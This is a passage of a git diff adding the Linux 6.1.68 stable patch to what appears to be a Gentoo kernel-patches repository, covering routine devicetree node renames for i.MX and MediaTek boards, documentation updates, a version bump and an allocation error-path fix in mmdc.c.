 1067_linux-6.1.68.patch | 9166 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9170 insertions(+)

diff --git a/0000_README b/0000_README
index 5f228fc4..a8206ed1 100644
--- a/0000_README
+++ b/0000_README
@@ -311,6 +311,10 @@ Patch:  1066_linux-6.1.67.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.67
 
+Patch:  1067_linux-6.1.68.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.68
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1067_linux-6.1.68.patch b/1067_linux-6.1.68.patch
new file mode 100644
index 00000000..78edec28
--- /dev/null
+++ b/1067_linux-6.1.68.patch
@@ -0,0 +1,9166 @@
+diff --git a/Documentation/ABI/testing/sysfs-bus-optee-devices b/Documentation/ABI/testing/sysfs-bus-optee-devices
+index 0f58701367b66..af31e5a22d89f 100644
+--- a/Documentation/ABI/testing/sysfs-bus-optee-devices
++++ b/Documentation/ABI/testing/sysfs-bus-optee-devices
+@@ -6,3 +6,12 @@ Description:
+ 		OP-TEE bus provides reference to registered drivers under this directory. The <uuid>
+ 		matches Trusted Application (TA) driver and corresponding TA in secure OS. Drivers
+ 		are free to create needed API under optee-ta-<uuid> directory.
++
++What:		/sys/bus/tee/devices/optee-ta-<uuid>/need_supplicant
++Date:		November 2023
++KernelVersion:	6.7
++Contact:	op-tee@lists.trustedfirmware.org
++Description:
++		Allows to distinguish whether an OP-TEE based TA/device requires user-space
++		tee-supplicant to function properly or not. This attribute will be present for
++		devices which depend on tee-supplicant to be running.
+diff --git a/Documentation/devicetree/bindings/interrupt-controller/qcom,mpm.yaml b/Documentation/devicetree/bindings/interrupt-controller/qcom,mpm.yaml
+index 509d20c091af8..6a206111d4e0f 100644
+--- a/Documentation/devicetree/bindings/interrupt-controller/qcom,mpm.yaml
++++ b/Documentation/devicetree/bindings/interrupt-controller/qcom,mpm.yaml
+@@ -62,6 +62,9 @@ properties:
+         - description: MPM pin number
+         - description: GIC SPI number for the MPM pin
+ 
++  '#power-domain-cells':
++    const: 0
++
+ required:
+   - compatible
+   - reg
+@@ -93,4 +96,5 @@ examples:
+                            <86 183>,
+                            <90 260>,
+                            <91 260>;
++        #power-domain-cells = <0>;
+     };
+diff --git a/Makefile b/Makefile
+index c27600b90cad2..2a8ad0cec2f1c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 67
++SUBLEVEL = 68
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx28-xea.dts b/arch/arm/boot/dts/imx28-xea.dts
+index a400c108f66a2..6c5e6856648af 100644
+--- a/arch/arm/boot/dts/imx28-xea.dts
++++ b/arch/arm/boot/dts/imx28-xea.dts
+@@ -8,6 +8,7 @@
+ #include "imx28-lwe.dtsi"
+ 
+ / {
++	model = "Liebherr XEA board";
+ 	compatible = "lwn,imx28-xea", "fsl,imx28";
+ };
+ 
+diff --git a/arch/arm/boot/dts/imx6ul-pico.dtsi b/arch/arm/boot/dts/imx6ul-pico.dtsi
+index 357ffb2f5ad61..dd6790852b0d6 100644
+--- a/arch/arm/boot/dts/imx6ul-pico.dtsi
++++ b/arch/arm/boot/dts/imx6ul-pico.dtsi
+@@ -121,6 +121,8 @@
+ 			max-speed = <100>;
+ 			interrupt-parent = <&gpio5>;
+ 			interrupts = <6 IRQ_TYPE_LEVEL_LOW>;
++			clocks = <&clks IMX6UL_CLK_ENET_REF>;
++			clock-names = "rmii-ref";
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 667568aa4326a..45947707134b8 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -454,7 +454,7 @@
+ 			};
+ 
+ 			gpt1: timer@302d0000 {
+-				compatible = "fsl,imx7d-gpt", "fsl,imx6sx-gpt";
++				compatible = "fsl,imx7d-gpt", "fsl,imx6dl-gpt";
+ 				reg = <0x302d0000 0x10000>;
+ 				interrupts = <GIC_SPI 55 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX7D_GPT1_ROOT_CLK>,
+@@ -463,7 +463,7 @@
+ 			};
+ 
+ 			gpt2: timer@302e0000 {
+-				compatible = "fsl,imx7d-gpt", "fsl,imx6sx-gpt";
++				compatible = "fsl,imx7d-gpt", "fsl,imx6dl-gpt";
+ 				reg = <0x302e0000 0x10000>;
+ 				interrupts = <GIC_SPI 54 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX7D_GPT2_ROOT_CLK>,
+@@ -473,7 +473,7 @@
+ 			};
+ 
+ 			gpt3: timer@302f0000 {
+-				compatible = "fsl,imx7d-gpt", "fsl,imx6sx-gpt";
++				compatible = "fsl,imx7d-gpt", "fsl,imx6dl-gpt";
+ 				reg = <0x302f0000 0x10000>;
+ 				interrupts = <GIC_SPI 53 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX7D_GPT3_ROOT_CLK>,
+@@ -483,7 +483,7 @@
+ 			};
+ 
+ 			gpt4: timer@30300000 {
+-				compatible = "fsl,imx7d-gpt", "fsl,imx6sx-gpt";
++				compatible = "fsl,imx7d-gpt", "fsl,imx6dl-gpt";
+ 				reg = <0x30300000 0x10000>;
+ 				interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX7D_GPT4_ROOT_CLK>,
+diff --git a/arch/arm/mach-imx/mmdc.c b/arch/arm/mach-imx/mmdc.c
+index b9efe9da06e0b..3d76e8c28c51d 100644
+--- a/arch/arm/mach-imx/mmdc.c
++++ b/arch/arm/mach-imx/mmdc.c
+@@ -502,6 +502,10 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 
+ 	name = devm_kasprintf(&pdev->dev,
+ 				GFP_KERNEL, "mmdc%d", ret);
++	if (!name) {
++		ret = -ENOMEM;
++		goto pmu_release_id;
++	}
+ 
+ 	pmu_mmdc->mmdc_ipg_clk = mmdc_ipg_clk;
+ 	pmu_mmdc->devtype_data = (struct fsl_mmdc_devtype_data *)of_id->data;
+@@ -524,9 +528,10 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 
+ pmu_register_err:
+ 	pr_warn("MMDC Perf PMU failed (%d), disabled\n", ret);
+-	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ 	cpuhp_state_remove_instance_nocalls(cpuhp_mmdc_state, &pmu_mmdc->node);
+ 	hrtimer_cancel(&pmu_mmdc->hrtimer);
++pmu_release_id:
++	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ pmu_free:
+ 	kfree(pmu_mmdc);
+ 	return ret;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp.dtsi b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+index 25630a395db56..8c34b3e12a66a 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+@@ -1301,6 +1301,7 @@
+ 				phys = <&usb3_phy0>, <&usb3_phy0>;
+ 				phy-names = "usb2-phy", "usb3-phy";
+ 				snps,gfladj-refclk-lpm-sel-quirk;
++				snps,parkmode-disable-ss-quirk;
+ 			};
+ 
+ 		};
+@@ -1343,6 +1344,7 @@
+ 				phys = <&usb3_phy1>, <&usb3_phy1>;
+ 				phy-names = "usb2-phy", "usb3-phy";
+ 				snps,gfladj-refclk-lpm-sel-quirk;
++				snps,parkmode-disable-ss-quirk;
+ 			};
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq.dtsi b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+index bf8f02c1535c1..e642cb7d54d77 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+@@ -1431,7 +1431,7 @@
+ 			phys = <&usb3_phy0>, <&usb3_phy0>;
+ 			phy-names = "usb2-phy", "usb3-phy";
+ 			power-domains = <&pgc_otg1>;
+-			usb3-resume-missing-cas;
++			snps,parkmode-disable-ss-quirk;
+ 			status = "disabled";
+ 		};
+ 
+@@ -1463,7 +1463,7 @@
+ 			phys = <&usb3_phy1>, <&usb3_phy1>;
+ 			phy-names = "usb2-phy", "usb3-phy";
+ 			power-domains = <&pgc_otg2>;
+-			usb3-resume-missing-cas;
++			snps,parkmode-disable-ss-quirk;
+ 			status = "disabled";
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+index d3f9eab2b7844..2c35ed0734a47 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+@@ -72,7 +72,7 @@
+ 		};
+ 	};
+ 
+-	memory {
++	memory@40000000 {
+ 		reg = <0 0x40000000 0 0x40000000>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+index 36722cabe626e..f9313b697ac12 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+@@ -54,7 +54,7 @@
+ 		};
+ 	};
+ 
+-	memory {
++	memory@40000000 {
+ 		reg = <0 0x40000000 0 0x20000000>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt8173-evb.dts b/arch/arm64/boot/dts/mediatek/mt8173-evb.dts
+index 0b5f154007be8..49c7185243cc1 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8173-evb.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8173-evb.dts
+@@ -43,7 +43,7 @@
+ 		id-gpio = <&pio 16 GPIO_ACTIVE_HIGH>;
+ 	};
+ 
+-	usb_p1_vbus: regulator@0 {
++	usb_p1_vbus: regulator-usb-p1 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "usb_vbus";
+ 		regulator-min-microvolt = <5000000>;
+@@ -52,7 +52,7 @@
+ 		enable-active-high;
+ 	};
+ 
+-	usb_p0_vbus: regulator@1 {
++	usb_p0_vbus: regulator-usb-p0 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "vbus";
+ 		regulator-min-microvolt = <5000000>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-evb.dts b/arch/arm64/boot/dts/mediatek/mt8183-evb.dts
+index 52dc4a50e34d3..2ca0da51efaa0 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-evb.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8183-evb.dts
+@@ -30,14 +30,14 @@
+ 		#address-cells = <2>;
+ 		#size-cells = <2>;
+ 		ranges;
+-		scp_mem_reserved: scp_mem_region {
++		scp_mem_reserved: memory@50000000 {
+ 			compatible = "shared-dma-pool";
+ 			reg = <0 0x50000000 0 0x2900000>;
+ 			no-map;
+ 		};
+ 	};
+ 
+-	ntc@0 {
++	thermal-sensor {
+ 		compatible = "murata,ncp03wf104";
+ 		pullup-uv = <1800000>;
+ 		pullup-ohm = <390000>;
+@@ -139,8 +139,8 @@
+ };
+ 
+ &pio {
+-	i2c_pins_0: i2c0{
+-		pins_i2c{
++	i2c_pins_0: i2c0 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO82__FUNC_SDA0>,
+ 				 <PINMUX_GPIO83__FUNC_SCL0>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -148,8 +148,8 @@
+ 		};
+ 	};
+ 
+-	i2c_pins_1: i2c1{
+-		pins_i2c{
++	i2c_pins_1: i2c1 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO81__FUNC_SDA1>,
+ 				 <PINMUX_GPIO84__FUNC_SCL1>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -157,8 +157,8 @@
+ 		};
+ 	};
+ 
+-	i2c_pins_2: i2c2{
+-		pins_i2c{
++	i2c_pins_2: i2c2 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO103__FUNC_SCL2>,
+ 				 <PINMUX_GPIO104__FUNC_SDA2>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -166,8 +166,8 @@
+ 		};
+ 	};
+ 
+-	i2c_pins_3: i2c3{
+-		pins_i2c{
++	i2c_pins_3: i2c3 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO50__FUNC_SCL3>,
+ 				 <PINMUX_GPIO51__FUNC_SDA3>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -175,8 +175,8 @@
+ 		};
+ 	};
+ 
+-	i2c_pins_4: i2c4{
+-		pins_i2c{
++	i2c_pins_4: i2c4 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO105__FUNC_SCL4>,
+ 				 <PINMUX_GPIO106__FUNC_SDA4>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -184,8 +184,8 @@
+ 		};
+ 	};
+ 
+-	i2c_pins_5: i2c5{
+-		pins_i2c{
++	i2c_pins_5: i2c5 {
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO48__FUNC_SCL5>,
+ 				 <PINMUX_GPIO49__FUNC_SDA5>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -193,8 +193,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_0: spi0{
+-		pins_spi{
++	spi_pins_0: spi0 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO85__FUNC_SPI0_MI>,
+ 				 <PINMUX_GPIO86__FUNC_SPI0_CSB>,
+ 				 <PINMUX_GPIO87__FUNC_SPI0_MO>,
+@@ -308,8 +308,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_1: spi1{
+-		pins_spi{
++	spi_pins_1: spi1 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO161__FUNC_SPI1_A_MI>,
+ 				 <PINMUX_GPIO162__FUNC_SPI1_A_CSB>,
+ 				 <PINMUX_GPIO163__FUNC_SPI1_A_MO>,
+@@ -318,8 +318,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_2: spi2{
+-		pins_spi{
++	spi_pins_2: spi2 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO0__FUNC_SPI2_CSB>,
+ 				 <PINMUX_GPIO1__FUNC_SPI2_MO>,
+ 				 <PINMUX_GPIO2__FUNC_SPI2_CLK>,
+@@ -328,8 +328,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_3: spi3{
+-		pins_spi{
++	spi_pins_3: spi3 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO21__FUNC_SPI3_MI>,
+ 				 <PINMUX_GPIO22__FUNC_SPI3_CSB>,
+ 				 <PINMUX_GPIO23__FUNC_SPI3_MO>,
+@@ -338,8 +338,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_4: spi4{
+-		pins_spi{
++	spi_pins_4: spi4 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO17__FUNC_SPI4_MI>,
+ 				 <PINMUX_GPIO18__FUNC_SPI4_CSB>,
+ 				 <PINMUX_GPIO19__FUNC_SPI4_MO>,
+@@ -348,8 +348,8 @@
+ 		};
+ 	};
+ 
+-	spi_pins_5: spi5{
+-		pins_spi{
++	spi_pins_5: spi5 {
++		pins_spi {
+ 			pinmux = <PINMUX_GPIO13__FUNC_SPI5_MI>,
+ 				 <PINMUX_GPIO14__FUNC_SPI5_CSB>,
+ 				 <PINMUX_GPIO15__FUNC_SPI5_MO>,
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+index 3ac83be536274..dccf367c7ec6c 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+@@ -101,6 +101,8 @@
+ 
+ &dsi0 {
+ 	status = "okay";
++	/delete-property/#size-cells;
++	/delete-property/#address-cells;
+ 	/delete-node/panel@0;
+ 	ports {
+ 		port {
+@@ -437,20 +439,20 @@
+ 	};
+ 
+ 	touchscreen_pins: touchscreen-pins {
+-		touch_int_odl {
++		touch-int-odl {
+ 			pinmux = <PINMUX_GPIO155__FUNC_GPIO155>;
+ 			input-enable;
+ 			bias-pull-up;
+ 		};
+ 
+-		touch_rst_l {
++		touch-rst-l {
+ 			pinmux = <PINMUX_GPIO156__FUNC_GPIO156>;
+ 			output-high;
+ 		};
+ 	};
+ 
+ 	trackpad_pins: trackpad-pins {
+-		trackpad_int {
++		trackpad-int {
+ 			pinmux = <PINMUX_GPIO7__FUNC_GPIO7>;
+ 			input-enable;
+ 			bias-disable; /* pulled externally */
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+index 632fd89e75969..a428a581c93a8 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+@@ -108,7 +108,7 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
+-		scp_mem_reserved: scp_mem_region {
++		scp_mem_reserved: memory@50000000 {
+ 			compatible = "shared-dma-pool";
+ 			reg = <0 0x50000000 0 0x2900000>;
+ 			no-map;
+@@ -423,7 +423,7 @@
+ 
+ &pio {
+ 	aud_pins_default: audiopins {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO97__FUNC_I2S2_MCK>,
+ 				<PINMUX_GPIO98__FUNC_I2S2_BCK>,
+ 				<PINMUX_GPIO101__FUNC_I2S2_LRCK>,
+@@ -445,7 +445,7 @@
+ 	};
+ 
+ 	aud_pins_tdm_out_on: audiotdmouton {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO169__FUNC_TDM_BCK_2ND>,
+ 				<PINMUX_GPIO170__FUNC_TDM_LRCK_2ND>,
+ 				<PINMUX_GPIO171__FUNC_TDM_DATA0_2ND>,
+@@ -457,7 +457,7 @@
+ 	};
+ 
+ 	aud_pins_tdm_out_off: audiotdmoutoff {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO169__FUNC_GPIO169>,
+ 				<PINMUX_GPIO170__FUNC_GPIO170>,
+ 				<PINMUX_GPIO171__FUNC_GPIO171>,
+@@ -471,13 +471,13 @@
+ 	};
+ 
+ 	bt_pins: bt-pins {
+-		pins_bt_en {
++		pins-bt-en {
+ 			pinmux = <PINMUX_GPIO120__FUNC_GPIO120>;
+ 			output-low;
+ 		};
+ 	};
+ 
+-	ec_ap_int_odl: ec_ap_int_odl {
++	ec_ap_int_odl: ec-ap-int-odl {
+ 		pins1 {
+ 			pinmux = <PINMUX_GPIO151__FUNC_GPIO151>;
+ 			input-enable;
+@@ -485,7 +485,7 @@
+ 		};
+ 	};
+ 
+-	h1_int_od_l: h1_int_od_l {
++	h1_int_od_l: h1-int-od-l {
+ 		pins1 {
+ 			pinmux = <PINMUX_GPIO153__FUNC_GPIO153>;
+ 			input-enable;
+@@ -493,7 +493,7 @@
+ 	};
+ 
+ 	i2c0_pins: i2c0 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO82__FUNC_SDA0>,
+ 				 <PINMUX_GPIO83__FUNC_SCL0>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -502,7 +502,7 @@
+ 	};
+ 
+ 	i2c1_pins: i2c1 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO81__FUNC_SDA1>,
+ 				 <PINMUX_GPIO84__FUNC_SCL1>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -511,7 +511,7 @@
+ 	};
+ 
+ 	i2c2_pins: i2c2 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO103__FUNC_SCL2>,
+ 				 <PINMUX_GPIO104__FUNC_SDA2>;
+ 			bias-disable;
+@@ -520,7 +520,7 @@
+ 	};
+ 
+ 	i2c3_pins: i2c3 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO50__FUNC_SCL3>,
+ 				 <PINMUX_GPIO51__FUNC_SDA3>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -529,7 +529,7 @@
+ 	};
+ 
+ 	i2c4_pins: i2c4 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO105__FUNC_SCL4>,
+ 				 <PINMUX_GPIO106__FUNC_SDA4>;
+ 			bias-disable;
+@@ -538,7 +538,7 @@
+ 	};
+ 
+ 	i2c5_pins: i2c5 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO48__FUNC_SCL5>,
+ 				 <PINMUX_GPIO49__FUNC_SDA5>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -547,7 +547,7 @@
+ 	};
+ 
+ 	i2c6_pins: i2c6 {
+-		pins_bus {
++		pins-bus {
+ 			pinmux = <PINMUX_GPIO11__FUNC_SCL6>,
+ 				 <PINMUX_GPIO12__FUNC_SDA6>;
+ 			bias-disable;
+@@ -555,7 +555,7 @@
+ 	};
+ 
+ 	mmc0_pins_default: mmc0-pins-default {
+-		pins_cmd_dat {
++		pins-cmd-dat {
+ 			pinmux = <PINMUX_GPIO123__FUNC_MSDC0_DAT0>,
+ 				 <PINMUX_GPIO128__FUNC_MSDC0_DAT1>,
+ 				 <PINMUX_GPIO125__FUNC_MSDC0_DAT2>,
+@@ -570,13 +570,13 @@
+ 			mediatek,pull-up-adv = <01>;
+ 		};
+ 
+-		pins_clk {
++		pins-clk {
+ 			pinmux = <PINMUX_GPIO124__FUNC_MSDC0_CLK>;
+ 			drive-strength = <MTK_DRIVE_14mA>;
+ 			mediatek,pull-down-adv = <10>;
+ 		};
+ 
+-		pins_rst {
++		pins-rst {
+ 			pinmux = <PINMUX_GPIO133__FUNC_MSDC0_RSTB>;
+ 			drive-strength = <MTK_DRIVE_14mA>;
+ 			mediatek,pull-down-adv = <01>;
+@@ -584,7 +584,7 @@
+ 	};
+ 
+ 	mmc0_pins_uhs: mmc0-pins-uhs {
+-		pins_cmd_dat {
++		pins-cmd-dat {
+ 			pinmux = <PINMUX_GPIO123__FUNC_MSDC0_DAT0>,
+ 				 <PINMUX_GPIO128__FUNC_MSDC0_DAT1>,
+ 				 <PINMUX_GPIO125__FUNC_MSDC0_DAT2>,
+@@ -599,19 +599,19 @@
+ 			mediatek,pull-up-adv = <01>;
+ 		};
+ 
+-		pins_clk {
++		pins-clk {
+ 			pinmux = <PINMUX_GPIO124__FUNC_MSDC0_CLK>;
+ 			drive-strength = <MTK_DRIVE_14mA>;
+ 			mediatek,pull-down-adv = <10>;
+ 		};
+ 
+-		pins_ds {
++		pins-ds {
+ 			pinmux = <PINMUX_GPIO131__FUNC_MSDC0_DSL>;
+ 			drive-strength = <MTK_DRIVE_14mA>;
+ 			mediatek,pull-down-adv = <10>;
+ 		};
+ 
+-		pins_rst {
++		pins-rst {
+ 			pinmux = <PINMUX_GPIO133__FUNC_MSDC0_RSTB>;
+ 			drive-strength = <MTK_DRIVE_14mA>;
+ 			mediatek,pull-up-adv = <01>;
+@@ -619,7 +619,7 @@
+ 	};
+ 
+ 	mmc1_pins_default: mmc1-pins-default {
+-		pins_cmd_dat {
++		pins-cmd-dat {
+ 			pinmux = <PINMUX_GPIO31__FUNC_MSDC1_CMD>,
+ 				 <PINMUX_GPIO32__FUNC_MSDC1_DAT0>,
+ 				 <PINMUX_GPIO34__FUNC_MSDC1_DAT1>,
+@@ -629,7 +629,7 @@
+ 			mediatek,pull-up-adv = <10>;
+ 		};
+ 
+-		pins_clk {
++		pins-clk {
+ 			pinmux = <PINMUX_GPIO29__FUNC_MSDC1_CLK>;
+ 			input-enable;
+ 			mediatek,pull-down-adv = <10>;
+@@ -637,7 +637,7 @@
+ 	};
+ 
+ 	mmc1_pins_uhs: mmc1-pins-uhs {
+-		pins_cmd_dat {
++		pins-cmd-dat {
+ 			pinmux = <PINMUX_GPIO31__FUNC_MSDC1_CMD>,
+ 				 <PINMUX_GPIO32__FUNC_MSDC1_DAT0>,
+ 				 <PINMUX_GPIO34__FUNC_MSDC1_DAT1>,
+@@ -648,7 +648,7 @@
+ 			mediatek,pull-up-adv = <10>;
+ 		};
+ 
+-		pins_clk {
++		pins-clk {
+ 			pinmux = <PINMUX_GPIO29__FUNC_MSDC1_CLK>;
+ 			drive-strength = <MTK_DRIVE_8mA>;
+ 			mediatek,pull-down-adv = <10>;
+@@ -656,15 +656,15 @@
+ 		};
+ 	};
+ 
+-	panel_pins_default: panel_pins_default {
+-		panel_reset {
++	panel_pins_default: panel-pins-default {
++		panel-reset {
+ 			pinmux = <PINMUX_GPIO45__FUNC_GPIO45>;
+ 			output-low;
+ 			bias-pull-up;
+ 		};
+ 	};
+ 
+-	pwm0_pin_default: pwm0_pin_default {
++	pwm0_pin_default: pwm0-pin-default {
+ 		pins1 {
+ 			pinmux = <PINMUX_GPIO176__FUNC_GPIO176>;
+ 			output-high;
+@@ -676,14 +676,14 @@
+ 	};
+ 
+ 	scp_pins: scp {
+-		pins_scp_uart {
++		pins-scp-uart {
+ 			pinmux = <PINMUX_GPIO110__FUNC_TP_URXD1_AO>,
+ 				 <PINMUX_GPIO112__FUNC_TP_UTXD1_AO>;
+ 		};
+ 	};
+ 
+ 	spi0_pins: spi0 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO85__FUNC_SPI0_MI>,
+ 				 <PINMUX_GPIO86__FUNC_GPIO86>,
+ 				 <PINMUX_GPIO87__FUNC_SPI0_MO>,
+@@ -693,7 +693,7 @@
+ 	};
+ 
+ 	spi1_pins: spi1 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO161__FUNC_SPI1_A_MI>,
+ 				 <PINMUX_GPIO162__FUNC_SPI1_A_CSB>,
+ 				 <PINMUX_GPIO163__FUNC_SPI1_A_MO>,
+@@ -703,20 +703,20 @@
+ 	};
+ 
+ 	spi2_pins: spi2 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO0__FUNC_SPI2_CSB>,
+ 				 <PINMUX_GPIO1__FUNC_SPI2_MO>,
+ 				 <PINMUX_GPIO2__FUNC_SPI2_CLK>;
+ 			bias-disable;
+ 		};
+-		pins_spi_mi {
++		pins-spi-mi {
+ 			pinmux = <PINMUX_GPIO94__FUNC_SPI2_MI>;
+ 			mediatek,pull-down-adv = <00>;
+ 		};
+ 	};
+ 
+ 	spi3_pins: spi3 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO21__FUNC_SPI3_MI>,
+ 				 <PINMUX_GPIO22__FUNC_SPI3_CSB>,
+ 				 <PINMUX_GPIO23__FUNC_SPI3_MO>,
+@@ -726,7 +726,7 @@
+ 	};
+ 
+ 	spi4_pins: spi4 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO17__FUNC_SPI4_MI>,
+ 				 <PINMUX_GPIO18__FUNC_SPI4_CSB>,
+ 				 <PINMUX_GPIO19__FUNC_SPI4_MO>,
+@@ -736,7 +736,7 @@
+ 	};
+ 
+ 	spi5_pins: spi5 {
+-		pins_spi{
++		pins-spi {
+ 			pinmux = <PINMUX_GPIO13__FUNC_SPI5_MI>,
+ 				 <PINMUX_GPIO14__FUNC_SPI5_CSB>,
+ 				 <PINMUX_GPIO15__FUNC_SPI5_MO>,
+@@ -746,63 +746,63 @@
+ 	};
+ 
+ 	uart0_pins_default: uart0-pins-default {
+-		pins_rx {
++		pins-rx {
+ 			pinmux = <PINMUX_GPIO95__FUNC_URXD0>;
+ 			input-enable;
+ 			bias-pull-up;
+ 		};
+-		pins_tx {
++		pins-tx {
+ 			pinmux = <PINMUX_GPIO96__FUNC_UTXD0>;
+ 		};
+ 	};
+ 
+ 	uart1_pins_default: uart1-pins-default {
+-		pins_rx {
++		pins-rx {
+ 			pinmux = <PINMUX_GPIO121__FUNC_URXD1>;
+ 			input-enable;
+ 			bias-pull-up;
+ 		};
+-		pins_tx {
++		pins-tx {
+ 			pinmux = <PINMUX_GPIO115__FUNC_UTXD1>;
+ 		};
+-		pins_rts {
++		pins-rts {
+ 			pinmux = <PINMUX_GPIO47__FUNC_URTS1>;
+ 			output-enable;
+ 		};
+-		pins_cts {
++		pins-cts {
+ 			pinmux = <PINMUX_GPIO46__FUNC_UCTS1>;
+ 			input-enable;
+ 		};
+ 	};
+ 
+ 	uart1_pins_sleep: uart1-pins-sleep {
+-		pins_rx {
++		pins-rx {
+ 			pinmux = <PINMUX_GPIO121__FUNC_GPIO121>;
+ 			input-enable;
+ 			bias-pull-up;
+ 		};
+-		pins_tx {
++		pins-tx {
+ 			pinmux = <PINMUX_GPIO115__FUNC_UTXD1>;
+ 		};
+-		pins_rts {
++		pins-rts {
+ 			pinmux = <PINMUX_GPIO47__FUNC_URTS1>;
+ 			output-enable;
+ 		};
+-		pins_cts {
++		pins-cts {
+ 			pinmux = <PINMUX_GPIO46__FUNC_UCTS1>;
+ 			input-enable;
+ 		};
+ 	};
+ 
